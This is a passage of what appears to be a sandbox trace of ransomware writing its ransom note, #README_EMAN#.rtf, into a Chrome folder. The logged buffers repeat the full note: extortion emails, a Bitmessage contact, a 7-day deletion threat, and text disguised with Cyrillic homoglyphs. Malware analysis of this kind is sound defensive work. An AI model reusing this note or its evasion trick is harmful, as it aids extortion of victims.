w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed0b48, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nt\x874«;³\x9eØd\x94\x9cÔÓ0xÄ'\x1bÁç\x80J²c_", lpUsedDefaultChar=0x0) returned 8717 [0220.344] WriteFile (in: hFile=0x228, lpBuffer=0x1ed0b48*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed0b48*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.344] CloseHandle (hObject=0x228) returned 1 [0220.344] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\#readme_eman#.rtf")) returned 0xffffffff [0220.344] GetLastError () returned 0x2 [0220.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK 